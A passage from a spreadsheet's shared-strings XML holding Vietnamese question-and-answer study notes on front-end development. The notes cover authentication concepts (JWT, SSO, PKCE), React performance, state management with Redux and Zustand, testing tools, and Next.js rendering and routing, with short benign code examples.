    <t>Session (Truyền thống): Trạng thái login nằm ở RAM/Database của Server. Client chỉ cầm cái vé giấy ghi số thứ tự (Session ID). Server phải tốn bộ nhớ để nhớ hết user.</t>
  </si>
  <si>
    <t>Token (Hiện đại/JWT): Trạng thái nằm ngay trong Token của Client. Server KHÔNG lưu gì cả (Stateless). Nhận được token cứ giải mã ra là biết ai. Cực kỳ dễ để mở rộng nhiều máy chủ (Scale).</t>
  </si>
  <si>
    <t>SSO (Single Sign-On) là gì?</t>
  </si>
  <si>
    <t>"Đăng nhập một lần". Bạn vào công ty, đăng nhập vào 1 cổng chung. Sau đó bạn vào phần mềm Kế toán, phần mềm Nhân sự, phần mềm Chấm công đều tự động nhận diện bạn, không bắt đăng nhập lại.</t>
  </si>
  <si>
    <r>
      <rPr>
        <i/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>Ví dụ:</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Bạn login Gmail, sau đó mở Google Drive hay YouTube đều đã thấy có tài khoản sẵn.</t>
    </r>
  </si>
  <si>
    <t>PKCE là gì (Proof Key for Code Exchange)?</t>
  </si>
  <si>
    <t>Đọc là "Pixy"). Là một chốt bảo mật nâng cao dành cho OAuth 2.0.
Với các ứng dụng Frontend (như React/Vue) hay Mobile app, ta không thể cất giấu mã bí mật (Client Secret) vì mã JS sẽ bị soi thấy.</t>
  </si>
  <si>
    <t>PKCE giải quyết bằng cách sinh ra một đoạn mã bí mật tạm thời tạo ngay tại thiết bị của user ở lúc bắt đầu login, và dùng nó để đổi lấy Token cuối cùng, khiến hacker nếu có chặn đường ăn cắp mã auth_code cũng vô dụng vì không có mã PKCE đi kèm.</t>
  </si>
  <si>
    <t>Vì sao component bị re-render?</t>
  </si>
  <si>
    <t>Có 3 lý do chính: State của nó thay đổi, Props truyền từ cha xuống thay đổi, hoặc Component Cha của nó bị re-render (dẫn đến toàn bộ con cháu bị render theo).</t>
  </si>
  <si>
    <t>Re-render có luôn xấu không?</t>
  </si>
  <si>
    <t>KHÔNG. Re-render là cách React cập nhật giao diện. Nó chỉ xấu khi render lại những component không hề thay đổi dữ liệu hoặc có logic tính toán quá nặng.</t>
  </si>
  <si>
    <t>Làm sao đo performance React &amp; React DevTools Profiler?</t>
  </si>
  <si>
    <t>Sử dụng React DevTools (Extension trình duyệt). Mở tab Profiler, bấm nút Record (Ghi), thao tác trên web, rồi bấm Stop.</t>
  </si>
  <si>
    <t>Biểu đồ sẽ cho bạn biết component nào ngốn nhiều thời gian render nhất (màu vàng/cam) và lý do nó re-render.</t>
  </si>
  <si>
    <t>React.memo là gì? Khi nào dùng?</t>
  </si>
  <si>
    <t>Là một HOC (Higher-Order Component) dùng để bọc component con lại. Nó ghi nhớ component này, nếu Props không đổi thì sẽ bỏ qua re-render dù Cha có re-render. Chỉ dùng cho các component nặng hoặc hay bị re-render vô cớ.</t>
  </si>
  <si>
    <t>React.memo có chặn render 100% không?</t>
  </si>
  <si>
    <t>KHÔNG. Nếu bên trong component đó có chứa useState, useReducer, hoặc dùng useContext và dữ liệu của chúng thay đổi, component vẫn bị re-render bình thường.</t>
  </si>
  <si>
    <t>useCallback và useMemo giúp gì?</t>
  </si>
  <si>
    <t>Để giải quyết câu 9:
useCallback: Giữ nguyên ô nhớ của Function.
useMemo: Giữ nguyên ô nhớ của Object/Array/Giá trị.</t>
  </si>
  <si>
    <t>// Cha bọc hàm lại bằng useCallback để địa chỉ ô nhớ không đổi
const handleClick = useCallback(() =&gt; console.log('Bấm'), []);
// Component Con được bọc React.memo sẽ không bị re-render oan
&lt;NutBam onClick={handleClick} /&gt;</t>
  </si>
  <si>
    <t>Memoization có nhược điểm gì?</t>
  </si>
  <si>
    <t>Tốn RAM (để lưu cache) và tốn CPU (để so sánh deps xem có nên tạo cache mới không). Dùng bừa bãi mọi nơi sẽ làm web chậm đi thay vì nhanh lên.</t>
  </si>
  <si>
    <t>Virtualization là gì? Xử lý list lớn thế nào?</t>
  </si>
  <si>
    <t>Nếu bạn render 10,000 thẻ &lt;li&gt;, DOM sẽ sập. Virtualization (Ảo hóa) là kỹ thuật chỉ render những thẻ đang thực sự hiển thị trên màn hình. Cuộn đến đâu, tái sử dụng thẻ đến đó.</t>
  </si>
  <si>
    <t>Khi nào dùng react-window hoặc react-virtualized?</t>
  </si>
  <si>
    <t>Dùng khi có danh sách dài hơn 500-1000 phần tử (như Bảng dữ liệu lớn, Feed bài viết).</t>
  </si>
  <si>
    <t>Code splitting, Lazy loading, React.lazy, Suspense?</t>
  </si>
  <si>
    <t>Code splitting &amp; Lazy loading: Cắt file JS khổng lồ thành nhiều mảnh nhỏ. Chỉ tải những mảnh cần thiết.</t>
  </si>
  <si>
    <t>React.lazy &amp; Suspense: Cú pháp của React để tải component ngầm định.</t>
  </si>
  <si>
    <t>const BieuDoNang = React.lazy(() =&gt; import('./BieuDo'));
// Suspense hiển thị Fallback (Loading) trong lúc chờ file BieuDo tải về mạng
&lt;Suspense fallback={&lt;p&gt;Đang tải...&lt;/p&gt;}&gt;
  &lt;BieuDoNang /&gt;
&lt;/Suspense&gt;</t>
  </si>
  <si>
    <t>Bundle size ảnh hưởng performance thế nào?</t>
  </si>
  <si>
    <t>Bundle (gói JS) càng to -&gt; Mạng tải càng lâu -&gt; Trình duyệt tốn nhiều thời gian đọc và chạy code -&gt; Màn hình trắng càng lâu (Chỉ số FCP kém).</t>
  </si>
  <si>
    <t>Tree shaking là gì?</t>
  </si>
  <si>
    <t>Tính năng của Webpack/Vite. Nó quét code của bạn, thấy bạn cài thư viện Lodash 100 hàm nhưng chỉ import đúng 1 hàm, nó sẽ tự động "rung cây" làm rụng đi 99 hàm kia khi build ra sản phẩm, giúp giảm dung lượng.</t>
  </si>
  <si>
    <t>Prefetch route có tác dụng gì?</t>
  </si>
  <si>
    <t>Tải trước tài nguyên của một trang (ở chế độ nền) khi người dùng di chuột (hover) vào link. Khi họ bấm click, trang sẽ hiện ra ngay lập tức.</t>
  </si>
  <si>
    <t>Hydration cost là gì?</t>
  </si>
  <si>
    <t>Trong Server-Side Rendering (Next.js), Server gửi HTML về để hiện nhanh.</t>
  </si>
  <si>
    <t xml:space="preserve"> Sau đó trình duyệt phải tải JS về và "bơm" sự sống (gắn sự kiện click/hover) vào cục HTML đó. Quá trình bơm này gọi là Hydration, nếu code lớn sẽ tốn CPU.</t>
  </si>
  <si>
    <t>Debounce input search &amp; Throttle scroll?</t>
  </si>
  <si>
    <t>Debounce (Gõ tìm kiếm): Đợi người dùng ngưng gõ 500ms mới gọi API.</t>
  </si>
  <si>
    <t>Throttle (Cuộn chuột): Giới hạn chỉ chạy hàm xử lý scroll tối đa 1 lần mỗi 200ms để không làm cháy CPU.</t>
  </si>
  <si>
    <t>Concurrent rendering là gì?</t>
  </si>
  <si>
    <t>Tính năng cốt lõi của React 18. Thay vì render 1 mạch từ đầu đến cuối không thể gián đoạn, React có thể tạm dừng việc render một thành phần nặng để ưu tiên phản hồi thao tác click/nhập liệu của người dùng trước, giúp web không bị đơ.</t>
  </si>
  <si>
    <t>Transition trong React giúp gì?</t>
  </si>
  <si>
    <t>Dùng hook useTransition. Đánh dấu một sự thay đổi state là "ưu tiên thấp".</t>
  </si>
  <si>
    <t>const [isPending, startTransition] = useTransition();
// Gõ tìm kiếm: Việc cập nhật ô Input là ưu tiên cao (chạy ngay), 
// Việc render danh sách kết quả là ưu tiên thấp (nằm trong startTransition).
onChange={(e) =&gt; {
  setInputValue(e.target.value); 
  startTransition(() =&gt; setDanhSachKetQua(e.target.value)); 
}}</t>
  </si>
  <si>
    <t>State management là gì?</t>
  </si>
  <si>
    <t>Là cách bạn tổ chức, lưu trữ và cập nhật các dữ liệu có thể thay đổi (state) trong ứng dụng.</t>
  </si>
  <si>
    <t>Quản lý tốt giúp dữ liệu không bị sai lệch, giao diện cập nhật đúng lúc và code dễ bảo trì.</t>
  </si>
  <si>
    <t>URL state là gì?</t>
  </si>
  <si>
    <t>Là việc bạn lưu trạng thái của web thẳng lên đường dẫn URL thay vì dùng useState.</t>
  </si>
  <si>
    <t>Lợi ích: Cực kỳ tuyệt vời vì bạn có thể copy cái link đó gửi cho bạn bè, họ mở lên sẽ thấy y hệt màn hình của bạn.</t>
  </si>
  <si>
    <t>Ví dụ: [https://shop.com/shoes?color=red&amp;size=40&amp;page=2](https://shop.com/shoes?color=red&amp;size=40&amp;page=2). Dùng useSearchParams (trong React Router) để quản lý.</t>
  </si>
  <si>
    <t>State nào nên để trong component? (Local)</t>
  </si>
  <si>
    <t>Trạng thái UI tạm thời (Dropdown đang mở hay đóng, Hover vào nút chưa).
Dữ liệu Form đang nhập (trước khi bấm Submit).</t>
  </si>
  <si>
    <t>Nguyên tắc: Càng giữ state ở phạm vi hẹp (local) càng tốt để tránh cả ứng dụng bị re-render.</t>
  </si>
  <si>
    <t>Prop drilling có phải luôn xấu không?</t>
  </si>
  <si>
    <t>KHÔNG. Prop drilling (Truyền prop qua nhiều tầng) giúp luồng dữ liệu cực kỳ rõ ràng và dễ theo dõi (Explicit).</t>
  </si>
  <si>
    <t>Nó chỉ thực sự "xấu" khi bạn truyền qua quá nhiều tầng (từ 4-5 tầng trở lên) khiến các component trung gian bị "rác" (vì ôm những prop chúng không xài). Truyền 1-2 tầng thì hoàn toàn bình thường và nên làm!</t>
  </si>
  <si>
    <t>Context có thay thế Redux không?</t>
  </si>
  <si>
    <t>HOÀN TOÀN KHÔNG.
Context: Chỉ là một "đường ống" để truyền dữ liệu xuyên tường (Dependency Injection), nó KHÔNG CÓ cơ chế tối ưu re-render. State trong Context đổi -&gt; Tất cả component dùng Context đó đều re-render.</t>
  </si>
  <si>
    <t>Redux: Là một "Kiến trúc quản lý State". Nó có công cụ DevTools siêu xịn để tua lại thời gian (Time-travel), và nó tối ưu re-render (Component nào cần đúng miếng data bị đổi thì mới render lại).</t>
  </si>
  <si>
    <t>Context phù hợp cho loại state nào?</t>
  </si>
  <si>
    <t>Chỉ phù hợp với dữ liệu rất ít khi thay đổi (Low frequency updates).
Tốt: Theme, Ngôn ngữ, Thông tin User (Đăng nhập 1 lần xài cả ngày).</t>
  </si>
  <si>
    <t>Xấu: State thay đổi liên tục (như tọa độ cuộn chuột, chữ đang gõ trong ô search). Nếu để vào Context, trang web của bạn sẽ giật tung chảo.</t>
  </si>
  <si>
    <t>Cache state là gì?</t>
  </si>
  <si>
    <t>Vì Server State gọi API rất tốn thời gian, người ta sinh ra "Cache State" (Bộ nhớ đệm).
Khi bạn gọi API lấy Danh sách bài viết ở Trang chủ, dữ liệu sẽ được lưu vào Cache State (RAM).</t>
  </si>
  <si>
    <t>Khi bạn bấm sang trang Giới thiệu rồi quay lại Trang chủ, UI sẽ lấy ngay dữ liệu từ Cache hiện lên cái rẹt (0 mili-giây), sau đó nó âm thầm gọi API ngầm (background) để cập nhật xem có bài mới không. (Đây là sức mạnh cốt lõi của thư viện React Query hoặc RTK Query).</t>
  </si>
  <si>
    <t>Testing là gì?</t>
  </si>
  <si>
    <t>Là quá trình chạy thử phần mềm bằng các đoạn code tự động để đảm bảo tính năng hoạt động đúng như thiết kế trước khi đưa cho người dùng.</t>
  </si>
  <si>
    <t>Các loại Test (Unit, Integration, E2E):</t>
  </si>
  <si>
    <t>Unit test: Test một đơn vị nhỏ nhất, bị cô lập hoàn toàn (Ví dụ: test hàm tính tổng 2 số, test 1 nút bấm đổi màu).</t>
  </si>
  <si>
    <t>Integration test: Test sự kết hợp của nhiều Unit (Ví dụ: Component Form nhập liệu kết hợp với State Management và hàm gọi API).</t>
  </si>
  <si>
    <t>E2E (End-to-End) test: Tự động hóa trình duyệt như một người dùng thật. (Ví dụ: Mở Chrome, nhập user/pass, click Đăng nhập, chờ chuyển sang trang chủ).</t>
  </si>
  <si>
    <t>Test pyramid là gì?</t>
  </si>
  <si>
    <t>"Kim tự tháp kiểm thử". Khuyên bạn nên viết nhiều Unit Test nhất (vì nó chạy nhanh, chi phí rẻ, nằm ở đáy kim tự tháp), một lượng vừa phải Integration Test, và rất ít E2E Test (nằm ở đỉnh vì nó chạy cực kỳ chậm và khó bảo trì).</t>
  </si>
  <si>
    <t>Testing implementation detail là gì?</t>
  </si>
  <si>
    <t>Là việc viết test kiểm tra quá sâu vào "nội tạng" của code.</t>
  </si>
  <si>
    <t xml:space="preserve"> Ví dụ: Test xem biến count trong state có giá trị là 1 hay không, hoặc test xem hàm handleClick có được gọi đúng tên hay không.</t>
  </si>
  <si>
    <t>Vì sao nên test behavior (hành vi) thay vì implementation?</t>
  </si>
  <si>
    <t>Nếu bạn test "nội tạng", khi bạn refactor code (đổi tên biến, đổi từ useState sang useReducer), test sẽ bị fail (báo lỗi) mặc dù giao diện người dùng vẫn hoạt động hoàn hảo.</t>
  </si>
  <si>
    <t xml:space="preserve"> Test hành vi (người dùng thấy gì trên màn hình) giúp code linh hoạt và test không bị giòn, dễ vỡ.</t>
  </si>
  <si>
    <t>Jest là gì?</t>
  </si>
  <si>
    <t>Framework test JavaScript phổ biến nhất (thường đi kèm React). Nó bao gồm tất cả: Test runner (trình chạy test), Assertion (các hàm expect), và Mocking (giả lập).</t>
  </si>
  <si>
    <t>Vitest là gì?</t>
  </si>
  <si>
    <t>Framework test thế hệ mới, sinh ra để tương thích với Vite. Chạy cực kỳ nhanh, hỗ trợ module ES hiện đại, và có API dùng y hệt như Jest.</t>
  </si>
  <si>
    <t>React Testing Library (RTL) là gì?</t>
  </si>
  <si>
    <t>Thư viện sinh ra để test các component React. Triết lý của nó là: "Test phần mềm giống với cách mà người dùng sử dụng nó nhất có thể". Nó không cho phép bạn chọc vào State nội bộ, mà ép bạn phải tìm kiếm các phần tử qua văn bản hiển thị trên màn hình.</t>
  </si>
  <si>
    <t>MSW (Mock Service Worker) là gì?</t>
  </si>
  <si>
    <t>Một thư viện tuyệt vời để giả lập (mock) API. Nó chặn các request mạng ngay tại tầng Service Worker, giúp component của bạn không hề biết là nó đang bị lừa, cứ ngỡ là đang gọi lên server thật.</t>
  </si>
  <si>
    <t>Coverage là gì?</t>
  </si>
  <si>
    <t>Độ phủ code. Là con số phần trăm cho biết các file test của bạn đã chạy qua bao nhiêu dòng code, bao nhiêu nhánh if/else, bao nhiêu hàm trong source code gốc.</t>
  </si>
  <si>
    <t>Khác biệt cốt lõi giữa npm, Yarn và pnpm?</t>
  </si>
  <si>
    <t>npm / Yarn: Khi bạn tạo 10 dự án React, chúng sẽ tải thư viện React về và copy ra thành 10 bản nhét vào 10 thư mục node_modules (Chiếm hàng chục GB ổ cứng vô ích).</t>
  </si>
  <si>
    <t>pnpm: Sử dụng cơ chế symlink (Liên kết cứng). pnpm chỉ tải React về máy đúng 1 lần duy nhất cất ở ổ C:. Cả 10 dự án kia chỉ tạo một đường dẫn (shortcut) trỏ về cái kho đó. Tốc độ cài đặt siêu nhanh và tiết kiệm hàng chục GB.</t>
  </si>
  <si>
    <t>Hoisting dependency là gì?</t>
  </si>
  <si>
    <t>Để giảm dung lượng, npm và Yarn áp dụng kỹ thuật Hoisting (Kéo lên).</t>
  </si>
  <si>
    <t>Nếu Thư viện A và Thư viện B đều dùng chung thư viện C, chúng sẽ kéo thư viện C lên nằm ở thư mục gốc của node_modules để không bị cài trùng lặp 2 lần.</t>
  </si>
  <si>
    <t>Redux là gì?</t>
  </si>
  <si>
    <t>Redux flow hoạt động thế nào?</t>
  </si>
  <si>
    <t>Hoạt động theo luồng dữ liệu một chiều khép kín (One-way data flow):
1. UI (Giao diện): Người dùng bấm nút (VD: Thêm vào giỏ hàng).
2. Dispatch: Hàm này sẽ "nã" một Action vào kho.</t>
  </si>
  <si>
    <t>3. Store: Chuyển Action đó cho Reducer.
4. Reducer: Đọc Action, lấy State cũ tính toán ra State mới.
5. UI: Dùng Selector lấy State mới về và vẽ lại màn hình.</t>
  </si>
  <si>
    <t>Store là gì?</t>
  </si>
  <si>
    <t>Là nguồn chân lý duy nhất (Single Source of Truth). Toàn bộ ứng dụng của bạn, dù to đến mấy, cũng chỉ có đúng 1 cái Store chứa toàn bộ State.</t>
  </si>
  <si>
    <t>Action là gì?</t>
  </si>
  <si>
    <t>Là một Object JS thuần túy để mô tả cái gì vừa xảy ra. Nó BẮT BUỘC phải có trường type (tên hành động), và thường kèm theo payload (dữ liệu gửi lên).</t>
  </si>
  <si>
    <t>Ví dụ: { type: 'cart/ADD_ITEM', payload: { id: 1, name: 'Áo' } }</t>
  </si>
  <si>
    <t>Reducer là gì?</t>
  </si>
  <si>
    <t>Là một Pure Function (Hàm thuần khiết). Nó nhận vào State hiện tại và Action vừa được gửi lên, sau đó gộp lại để trả về một State mới.</t>
  </si>
  <si>
    <t>(Quy tắc sống còn: Reducer tuyệt đối không được sửa trực tiếp (mutate) state cũ, mà phải copy ra bản mới để sửa).</t>
  </si>
  <si>
    <t>Dispatch là gì?</t>
  </si>
  <si>
    <t>Là "người đưa thư". Component không thể tự động sửa Store, nó bắt buộc phải gọi hàm dispatch(action) để gửi yêu cầu thay đổi vào hệ thống.</t>
  </si>
  <si>
    <t>Middleware là gì?</t>
  </si>
  <si>
    <t>Là "kẻ đứng giữa" chặn đường đi từ Dispatch tới Reducer. Nó dùng để: In log xem action nào vừa chạy, gọi API (bất đồng bộ), hoặc chặn không cho action đi tiếp nếu user chưa đăng nhập.</t>
  </si>
  <si>
    <t>Redux Toolkit (RTK) là gì?</t>
  </si>
  <si>
    <t>Là bộ công cụ tiêu chuẩn, chính thức do chính đội ngũ Redux tạo ra để giải quyết lời phàn nàn: "Code Redux thuần dài dòng và cấu hình quá phức tạp".</t>
  </si>
  <si>
    <t>Vì sao nên dùng Redux Toolkit?</t>
  </si>
  <si>
    <t>Cấu hình Store cực nhanh với configureStore.
Tích hợp sẵn Redux Thunk và Redux DevTools (không cần cài thêm).</t>
  </si>
  <si>
    <t>Giảm 70% lượng code thừa (boilerplate) nhờ tính năng Slice.
Cho phép viết code "như thể" đang mutate (sửa trực tiếp) State nhờ có Immer.</t>
  </si>
  <si>
    <t>Slice là gì?</t>
  </si>
  <si>
    <t>Trong Redux thuần, bạn phải tách riêng 3 file: actions.js, constants.js, reducers.js.
Trong RTK, Slice gom cả 3 thứ đó vào 1 file duy nhất cho từng tính năng (Ví dụ: userSlice.js, cartSlice.js).</t>
  </si>
  <si>
    <t>createSlice làm gì?</t>
  </si>
  <si>
    <t>Là hàm cốt lõi của RTK. Bạn chỉ cần định nghĩa tên Slice, giá trị ban đầu (initialState) và các hàm reducer. createSlice sẽ tự động sinh ra (auto-generate) Action Creators và Action Types cho bạn.</t>
  </si>
  <si>
    <t>Redux Thunk là gì?</t>
  </si>
  <si>
    <t>Là Middleware mặc định của RTK. Nó cho phép hàm Action Creator trả về một Hàm (Function) thay vì một Object. Trong cái Hàm đó, bạn có thể gọi API thoải mái, chờ API trả kết quả xong mới dispatch data vào Reducer.</t>
  </si>
  <si>
    <t>. Redux Saga là gì?</t>
  </si>
  <si>
    <t>Một Middleware xử lý API cực mạnh, nhưng học khó hơn. Nó dùng khái niệm Generator Functions (các hàm có dấu * và từ khóa yield) của ES6 để xử lý bất đồng bộ như thể đang viết code đồng bộ.</t>
  </si>
  <si>
    <t>Zustand là gì?</t>
  </si>
  <si>
    <t>Nó là một thư viện quản lý Global State cực kỳ nhỏ gọn, nhanh và không cần dùng Context Provider bao bọc bên ngoài App. Bạn chỉ cần khai báo một Hook và xài ở bất cứ đâu.</t>
  </si>
  <si>
    <t>Zustand khác Redux thế nào?</t>
  </si>
  <si>
    <t>Boilerplate (Code rườm rà): Redux cần Action, Reducer, Dispatch, Store. Zustand gộp tất cả vào đúng 1 cái Hook (chỉ cần 5 dòng code là chạy).</t>
  </si>
  <si>
    <t>Provider: Redux bắt buộc bọc  ngoài cùng App.jsx. Zustand không cần, gọi ở đâu xài ở đó.</t>
  </si>
  <si>
    <t>import { create } from 'zustand';
// Tạo store
const useStore = create((set) =&gt; ({
  count: 0,
  tangLen: () =&gt; set((state) =&gt; ({ count: state.count + 1 })),
}));
// Dùng trong Component
function Counter() {
  const { count, tangLen } = useStore();
  return &lt;button onClick={tangLen}&gt;{count}&lt;/button&gt;;
}</t>
  </si>
  <si>
    <t>Khi nào chọn Zustand?</t>
  </si>
  <si>
    <t>Cho 80% các dự án React hiện đại (từ nhỏ đến vừa và khá lớn). Khi bạn muốn một Store dùng chung toàn cục giống Redux nhưng ghét phải viết quá nhiều file cấu hình phức tạp.</t>
  </si>
  <si>
    <t>Khi nào chọn Redux?</t>
  </si>
  <si>
    <t>Khi làm các dự án Enterprise (ngân hàng, thương mại điện tử lớn) với team vài chục dev. Redux có các quy tắc khắt khe giúp cả team code theo một chuẩn duy nhất, và DevTools của nó vô địch trong việc dò lỗi.</t>
  </si>
  <si>
    <t>Khi nào chọn Context?</t>
  </si>
  <si>
    <t>Khi dữ liệu hiếm khi thay đổi (Theme Sáng/Tối, Ngôn ngữ, Auth Token). Không dùng Context cho dữ liệu đổi liên tục vì nó sẽ làm toàn bộ ứng dụng bị Re-render giật lag.</t>
  </si>
  <si>
    <t>CSR (Client-Side Rendering) ?</t>
  </si>
  <si>
    <t>React thuần. Server trả về file HTML trắng bóc. Trình duyệt tải JS về xong mới tự vẽ giao diện. Dễ giật lag mạng yếu, SEO kém.</t>
  </si>
  <si>
    <t>SSR (Server-Side Rendering) ?</t>
  </si>
  <si>
    <t>Mỗi khi user gõ URL, Server sẽ chạy code React, tạo ra file HTML hoàn chỉnh rồi gửi về. SEO cực tốt, luôn có dữ liệu mới, nhưng Server phải làm việc mệt mỏi.</t>
  </si>
  <si>
    <t xml:space="preserve">SSG (Static Site Generation) ? </t>
  </si>
  <si>
    <t>Build HTML sẵn từ lúc gõ lệnh npm run build. Khi user vào, chỉ việc lấy file HTML có sẵn ném cho họ. Tốc độ bàn thờ (0ms), nhưng dữ liệu bị cứng, không cập nhật realtime được (Hợp làm Blog, Landing page).</t>
  </si>
  <si>
    <t>ISR (Incremental Static Regeneration)?</t>
  </si>
  <si>
    <t>Sự lai tạo hoàn hảo. Giống SSG (tạo HTML sẵn), nhưng bạn cài thêm thời gian (VD: 60s). Sau 60s, nếu có người truy cập, Next.js sẽ tự động build lại trang đó ngầm dưới background để cập nhật data mới.</t>
  </si>
  <si>
    <t>// Ví dụ ISR với Fetch (Next.js App Router)
// Dữ liệu sẽ được cache cứng, nhưng cứ sau 3600s (1 tiếng) sẽ tự động làm mới
const res = await fetch('https://api.com/data', { next: { revalidate: 3600 } });</t>
  </si>
  <si>
    <t>Streaming SSR ?</t>
  </si>
  <si>
    <t>Kỹ thuật chia nhỏ trang web. Cái nào có sẵn (Header, Footer) gửi về trước cho user xem. Cái nào phải đợi API (Bảng dữ liệu) thì gửi &lt;Loading/&gt;, data về xong thì "bơm" tiếp phần HTML đó xuống.</t>
  </si>
  <si>
    <t>Pages Router?</t>
  </si>
  <si>
    <t>Cách cũ (Next 12 trở xuống). Mỗi file trong thư mục pages/ tự biến thành một URL.</t>
  </si>
  <si>
    <t>Next.js là gì? Khác gì React?</t>
  </si>
  <si>
    <t>React chỉ là thư viện vẽ giao diện (UI). Next.js là một Framework hoàn chỉnh bọc ngoài React, cung cấp sẵn Routing, SSR/SSG, tối ưu hình ảnh, và cả viết API Backend.</t>
  </si>
  <si>
    <t>App Router?</t>
  </si>
  <si>
    <t>Cách mới (Next 13+). Mạnh mẽ hơn, dựa trên thư mục app/, dùng layout lồng nhau và mặc định dùng Server Components.</t>
  </si>
  <si>
    <t>Server Component (RSC)</t>
  </si>
  <si>
    <t>Mặc định trong App Router. Component này chỉ chạy trên Server, không gửi JS xuống trình duyệt.</t>
  </si>
  <si>
    <t>Tải cực nhanh, bảo mật tốt (gọi database thẳng trong này), nhưng không thể dùng useState hay onClick.</t>
  </si>
  <si>
    <t xml:space="preserve">Client Component &amp; "use client" ? </t>
  </si>
  <si>
    <t>Khi bạn cần tương tác (bấm nút, dùng Hook), bạn PHẢI thêm dòng "use client" lên đầu file. Lúc này nó hoạt động y hệt React bình thường.</t>
  </si>
  <si>
    <t>"use client" // Bắt buộc phải có nếu muốn xài useState
import { useState } from 'react';
export default function NutBam() {
  const [dem, setDem] = useState(0);
  return &lt;button onClick={() =&gt; setDem(dem+1)}&gt;Bấm: {dem}&lt;/button&gt;;
}</t>
  </si>
  <si>
    <t>Hydration là gì?</t>
  </si>
  <si>
    <t>Khi dùng SSR, HTML được gửi về trình duyệt chỉ là "cái xác khô" (chưa bấm được).</t>
  </si>
  <si>
    <t>Quá trình React tải JS về và "bơm sự sống" (gắn event onClick, hook) vào cái xác HTML đó gọi là Hydration.</t>
  </si>
  <si>
    <t>Hydration mismatch?</t>
  </si>
  <si>
    <t xml:space="preserve">Lỗi xảy ra khi HTML do Server tạo ra KHÔNG KHỚP với HTML do trình duyệt tính toán ở lần chạy đầu tiên. </t>
  </si>
  <si>
    <t>(Ví dụ: Server render ra giờ UTC, trình duyệt render ra giờ Việt Nam -&gt; Lệch nhau -&gt; Báo lỗi đỏ).</t>
  </si>
  <si>
    <t>Cách tránh mismatch?</t>
  </si>
  <si>
    <t>Nếu có dữ liệu phụ thuộc vào thiết bị (như thời gian nội bộ, window.innerWidth), hãy chờ useEffect chạy xong mới render.</t>
  </si>
  <si>
    <t>// Tránh Mismatch bằng cách hoãn render những thứ rắc rối
const [mounted, setMounted] = useState(false);
useEffect(() =&gt; setMounted(true), []);
if (!mounted) return null; // Server chỉ render rỗng, trình duyệt mới render thật
return &lt;div&gt;{window.innerWidth}px&lt;/div&gt;;</t>
  </si>
  <si>
    <t>Static route?</t>
  </si>
  <si>
    <t>Thư mục /about -&gt; URL: domain.com/about</t>
  </si>
  <si>
    <t>Dynamic route?</t>
  </si>
  <si>
    <t>Thư mục /[id] -&gt; URL: domain.com/123. Lấy ID ra bằng params.id.</t>
  </si>
  <si>
    <t>Layout (layout.tsx)?</t>
  </si>
  <si>
    <t>Khung bao bọc dùng chung. Khi chuyển trang, Layout không bị re-render (giữ nguyên state của thanh cuộn, sidebar).</t>
  </si>
  <si>
    <t>Template (template.tsx)?</t>
  </si>
  <si>
    <t>Giống Layout nhưng sẽ re-render lại từ đầu mỗi khi chuyển trang (Dùng khi bạn muốn hiệu ứng animation chạy lại từ đầu).</t>
  </si>
  <si>
    <t>Loading, Error, Not Found?</t>
  </si>
  <si>
    <t>Tạo các file loading.tsx, error.tsx, not-found.tsx trong cùng thư mục. Next.js tự động hiện loading.tsx trong lúc chờ gọi API ở component chính.</t>
  </si>
  <si>
    <t>API Routes / Route Handler?</t>
  </si>
  <si>
    <t>Tạo Backend ngay trong Next.js (file route.ts). Trả về JSON, xử lý DB y hệt NodeJS/Express.</t>
  </si>
  <si>
    <t>Server Action?</t>
  </si>
  <si>
    <t>Tính năng cực kỳ "phép thuật". Bạn viết một hàm asnyc chạy trên Server, rồi gắn thẳng nó vào sự kiện action của &lt;form&gt; trên Client mà không cần viết API.</t>
  </si>
  <si>
    <t>// Server Action (Chạy thẳng trên Server)
async function taoUserMoi(formData) {
  "use server" // Định nghĩa đây là Server Action
  const ten = formData.get('name');
  await db.users.create({ name: ten });
}
export default function FormClient() {
  // Gắn thẳng vào form, không cần preventDefault hay fetch()
  return &lt;form action={taoUserMoi}&gt;&lt;input name="name"/&gt;&lt;button&gt;Lưu&lt;/button&gt;&lt;/form&gt;
}</t>
  </si>
  <si>
    <t>generateStaticParams?</t>
  </si>
  <si>
    <t>revalidatePath / revalidateTag?</t>
  </si>
  <si>
    <t>Cache &amp; Fetch Cache?</t>
  </si>
  <si>
    <t>SEO tốt hơn vì sao</t>
  </si>
  <si>
    <t>Vì code là SSR/SSG. Bot Google đọc file HTML thấy ngay bài viết, tiêu đề, ảnh (CSR của React thì Google chỉ thấy file HTML rỗng).</t>
  </si>
  <si>
    <t>Metadata API?</t>
  </si>
  <si>
    <t>Cấu hình thẻ &lt;title&gt;, &lt;meta&gt; siêu dễ bằng cách export metadata ngay trong file.</t>
  </si>
  <si>
    <t>next/link?</t>
  </si>
  <si>
    <t>Khi bạn dùng &lt;Link href="..."&gt;, Next.js sẽ ngầm tải trước (prefetch) dữ liệu của trang đó khi bạn hover chuột vào. Bấm 1 phát là sang trang ngay.</t>
  </si>
  <si>
    <t>Image &amp; Font Optimization</t>
  </si>
  <si>
    <t>Đừng dùng thẻ &lt;img&gt; HTML, hãy dùng &lt;Image&gt;. Nó tự động nén ảnh WebP, chống giật Layout Shift, tự thay đổi kích thước theo điện thoại.</t>
  </si>
  <si>
    <t>next/font tự tải font về host nội bộ, không cần gọi lên Google Fonts nữa.</t>
  </si>
  <si>
    <t>Suspense</t>
  </si>
  <si>
    <t>Node runtime?</t>
  </si>
  <si>
    <t>Chạy bằng NodeJS tiêu chuẩn. Nặng, đủ mọi chức năng.</t>
  </si>
  <si>
    <t>Edge runtime?</t>
  </si>
  <si>
    <t>Môi trường rút gọn siêu nhẹ. Code của bạn được đẩy lên các máy chủ biên (Edge CDN) rải rác toàn cầu, user ở đâu tải ở máy chủ gần nhất -&gt; Tốc độ phản hồi tính bằng ms.</t>
  </si>
  <si>
    <t>Nhưng không dùng được một số thư viện Node quá nặng.</t>
  </si>
  <si>
    <t>Middleware (middleware.ts)</t>
  </si>
  <si>
    <t>Chạy trước BẤT KỲ request nào. Thường dùng ở Edge. Dùng để: Chặn user chưa login đá về trang chủ, tự động chuyển đổi ngôn ngữ (i18n), bảo mật.</t>
  </si>
  <si>
    <t>CI/CD là gì?</t>
  </si>
  <si>
